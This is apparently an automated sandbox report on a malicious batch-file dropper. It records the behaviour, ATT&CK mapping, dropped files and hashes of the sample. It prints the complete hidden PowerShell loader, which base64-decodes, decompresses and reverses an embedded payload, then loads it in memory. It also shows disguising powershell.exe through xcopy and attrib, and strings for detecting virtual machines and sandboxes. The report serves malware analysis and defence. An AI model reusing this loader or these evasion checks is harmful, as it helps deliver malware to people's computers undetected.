                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuMemory allocated: 8F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuWindow / User API: threadDelayed 3400Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuWindow / User API: threadDelayed 1542Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu TID: 6616Thread sleep count: 3400 > 30Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu TID: 7092Thread sleep count: 1542 > 30Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu TID: 2380Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu TID: 7100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuThread delayed: delay time: 922337203685477Jump to behavior
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                Source: INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu -WindowStyle hidden -command "$Hohcwatlus = get-content 'C:\Users\user\Desktop\INQ24-0122070030786451.bat' | Select-Object -Last 1; $Qlhoh = [System.Convert]::FromBase64String($Hohcwatlus);$Mvwalaytoyd = New-Object System.IO.MemoryStream( , $Qlhoh );$Myhbvcux = New-Object System.IO.MemoryStream;$Uvlejdiywlp = New-Object System.IO.Compression.GzipStream $Mvwalaytoyd, ([IO.Compression.CompressionMode]::Decompress);$Uvlejdiywlp.CopyTo( $Myhbvcux );$Uvlejdiywlp.Close();$Mvwalaytoyd.Close();[byte[]] $Qlhoh = $Myhbvcux.ToArray();[Array]::Reverse($Qlhoh); $Rbyymtwxmx = [System.AppDomain]::CurrentDomain.Load($Qlhoh); $Qokucu = $Rbyymtwxmx.EntryPoint; $Qokucu.DeclaringType.InvokeMember($Qokucu.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu c:\users\user\desktop\inq24-0122070030786451.bat.izu -windowstyle hidden -command "$hohcwatlus = get-content 'c:\users\user\desktop\inq24-0122070030786451.bat' | select-object -last 1; $qlhoh = [system.convert]::frombase64string($hohcwatlus);$mvwalaytoyd = new-object system.io.memorystream( , $qlhoh );$myhbvcux = new-object system.io.memorystream;$uvlejdiywlp = new-object system.io.compression.gzipstream $mvwalaytoyd, ([io.compression.compressionmode]::decompress);$uvlejdiywlp.copyto( $myhbvcux );$uvlejdiywlp.close();$mvwalaytoyd.close();[byte[]] $qlhoh = $myhbvcux.toarray();[array]::reverse($qlhoh); $rbyymtwxmx = [system.appdomain]::currentdomain.load($qlhoh); $qokucu = $rbyymtwxmx.entrypoint; $qokucu.declaringtype.invokemember($qokucu.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu c:\users\user\desktop\inq24-0122070030786451.bat.izu -windowstyle hidden -command "$hohcwatlus = get-content 'c:\users\user\desktop\inq24-0122070030786451.bat' | select-object -last 1; $qlhoh = [system.convert]::frombase64string($hohcwatlus);$mvwalaytoyd = new-object system.io.memorystream( , $qlhoh );$myhbvcux = new-object system.io.memorystream;$uvlejdiywlp = new-object system.io.compression.gzipstream $mvwalaytoyd, ([io.compression.compressionmode]::decompress);$uvlejdiywlp.copyto( $myhbvcux );$uvlejdiywlp.close();$mvwalaytoyd.close();[byte[]] $qlhoh = $myhbvcux.toarray();[array]::reverse($qlhoh); $rbyymtwxmx = [system.appdomain]::currentdomain.load($qlhoh); $qokucu = $rbyymtwxmx.entrypoint; $qokucu.declaringtype.invokemember($qokucu.name, [system.reflection.bindingflags]::invokemethod, $null, $null, $null)| out-null"Jump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\INQ24-0122070030786451.bat.IzuKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Command and Scripting Interpreter                		1
                Scripting                		11
                Process Injection                		11
                Masquerading                		OS Credential Dumping11
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets12
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                INQ24-0122070030786451.bat5%ReversingLabs

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exeINQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://github.com/mgravell/protobuf-netiINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://stackoverflow.com/q/14436606/23354INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.000000000595A000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/mgravell/protobuf-netJINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://aka.ms/pscore6lBINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://stackoverflow.com/q/11564914/23354;INQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://nuget.org/nuget.exeINQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/LicenseINQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/IconINQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.00000000062A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.00000000057CB000.00000004.00000800.00020000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2143414095.000000000A710000.00000004.08000000.00040000.00000000.sdmp, INQ24-0122070030786451.bat.Izu, 00000007.00000002.2118916133.0000000006E19000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005241000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/Pester/PesterINQ24-0122070030786451.bat.Izu, 00000007.00000002.2114245820.0000000005397000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                No contacted IP infos

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1574509
                                                Start date and time:2024-12-13 11:45:49 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 4m 32s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:8
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:INQ24-0122070030786451.bat
                                                Detection:MAL
                                                Classification:mal96.evad.winBAT@12/5@0/0
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 86%
                                                • Number of executed functions: 151
                                                • Number of non-executed functions: 18
                                                Cookbook Comments:
                                                • Found application associated with file extension: .bat
                                                • Stop behavior analysis, all processes terminated

                                                Warnings

                                                • Exclude process from analysis (whitelisted): dllhost.exe
                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                                                • Execution Graph export aborted for target INQ24-0122070030786451.bat.Izu, PID 6600 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • VT rate limit hit for: INQ24-0122070030786451.bat

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                05:46:42API Interceptor15x Sleep call for process: INQ24-0122070030786451.bat.Izu modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu8820_715_SCAN.vbsGet hashmaliciousUnknownBrowse
                                                  PaymentAdvice-1629043.vbsGet hashmaliciousNeshtaBrowse
                                                    FileCopy.vbsGet hashmaliciousUnknownBrowse
                                                      Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                        Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                          GRAINS.vbsGet hashmaliciousAgentTeslaBrowse
                                                            PRODUCT-PICTURE.batGet hashmaliciousAgentTeslaBrowse
                                                              Fattura-24SC-99245969925904728562.vbsGet hashmaliciousDiscord Token StealerBrowse
                                                                ilZhNx3JAc.batGet hashmaliciousAgentTeslaBrowse
                                                                  87M9Y3P4Z7.batGet hashmaliciousAgentTeslaBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQ24-0122070030786451.bat.Izu.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):3564
                                                                    Entropy (8bit):5.355829148765405
                                                                    Encrypted:false
                                                                    SSDEEP:96:iqlYqh3o9CgkEifqzVqU57UxqMRatI6Nfr0aq4yIIVMDDqFhMFrwD:iqlYqh35EIqzVqU578qMUtI6hZqvIIVB
                                                                    MD5:6112F7DC6A803CD7049702A24611DB2E
                                                                    SHA1:B59BD5EBE662355411CEAFBC48679D2C6FF386C7
                                                                    SHA-256:1FE2B8192B668F2B0E41C9A8B39C5CF6BA6217068371792C00C230A106EB260B
                                                                    SHA-512:4019CB8C8365869CBFDE892C6B187582C705FBBDED43EB93701C042BB068E57DF0B7AB1EFF79BC4A04C4EC33D67BD468C0A4C5B25D62A1A256EEA4938DD36785
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\bc6fa6cbc82ba7e8e7f31ce87cd85b5f\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\7ae6ae69c7471e5e034a046629402c6a\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5

                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1420
                                                                    Entropy (8bit):5.416732072095336
                                                                    Encrypted:false
                                                                    SSDEEP:24:3XEFytQWSKco4KmM6lss4RP7mFoUebIlmjKcmZ9tXt/NK3R88bJ0Ad+9Hr2W3bn:0yWWSU4fv4RTmFoUeUmfmZ9tlNWR83/D
                                                                    MD5:0AB7C3FB897F025E974E3D19894E86FC
                                                                    SHA1:C3DD52D848762F535894FF4D8967F8AA96E3512B
                                                                    SHA-256:910A3D01894B2BD4F52F7BD577A57EAE646152D9FE9E8E54EF84DBFC21809CA2
                                                                    SHA-512:F3FBAF16F8A8EEEED4E5D6A25BECE60E3B4682D3794A28F98B003652195C6CB27F6EE6C9559141E5989D36BFE776CFFCBF8A25A7F510AB96D08DBD395214E450
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0mwzbbm.nqf.psm1

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1aylkvg.cqn.ps1

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\Desktop\INQ24-0122070030786451.bat.Izu

                                                                    Download File
                                                                    Process:C:\Windows\System32\xcopy.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):433152
                                                                    Entropy (8bit):5.502549953174867
                                                                    Encrypted:false
                                                                    SSDEEP:6144:MF45pGVc4sqEoWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:95pGVcwW2KXzJ4pdd3klnnWosPhnzq
                                                                    MD5:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    SHA1:F5EE89BB1E4A0B1C3C7F1E8D05D0677F2B2B5919
                                                                    SHA-256:73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70
                                                                    SHA-512:6E43DCA1B92FAACE0C910CBF9308CF082A38DD39DA32375FAD72D6517DEA93E944B5E5464CF3C69A61EABF47B2A3E5AA014D6F24EFA1A379D4C81C32FA39DDBC
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: 8820_715_SCAN.vbs, Detection: malicious, Browse
                                                                    • Filename: PaymentAdvice-1629043.vbs, Detection: malicious, Browse
                                                                    • Filename: FileCopy.vbs, Detection: malicious, Browse
                                                                    • Filename: Pyyidau.vbs, Detection: malicious, Browse
                                                                    • Filename: Pyyidau.vbs, Detection: malicious, Browse
                                                                    • Filename: GRAINS.vbs, Detection: malicious, Browse
                                                                    • Filename: PRODUCT-PICTURE.bat, Detection: malicious, Browse
                                                                    • Filename: Fattura-24SC-99245969925904728562.vbs, Detection: malicious, Browse
                                                                    • Filename: ilZhNx3JAc.bat, Detection: malicious, Browse
                                                                    • Filename: 87M9Y3P4Z7.bat, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......".z.fg..fg..fg..x5..dg..o...lg..r...eg..r...}g..fg...g..r...cg..r...og..r...ng..r..gg..r...gg..Richfg..........................PE..L...s/.0..........................................@......................................@...... ...........................".......0...}......................|....I..T............................................ ...............................text...\........................... ..`.data...8...........................@....idata....... ......................@..@.rsrc....}...0...~..................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:Unicode text, UTF-8 text, with very long lines (56634), with CRLF, CR, LF line terminators
                                                                    Entropy (8bit):6.026524826938936
                                                                    TrID:
                                                                      File name:INQ24-0122070030786451.bat
                                                                      File size:2'039'860 bytes
                                                                      MD5:f6f5132b639fe3009babd9094008115d
                                                                      SHA1:3b6a5fefdffc66df9b1bc829f9295911c8260e19
                                                                      SHA256:52f88aa8b5720e04788bae4f6d20019d6ad5cfd65e15c888f1d1b8cdba34b37e
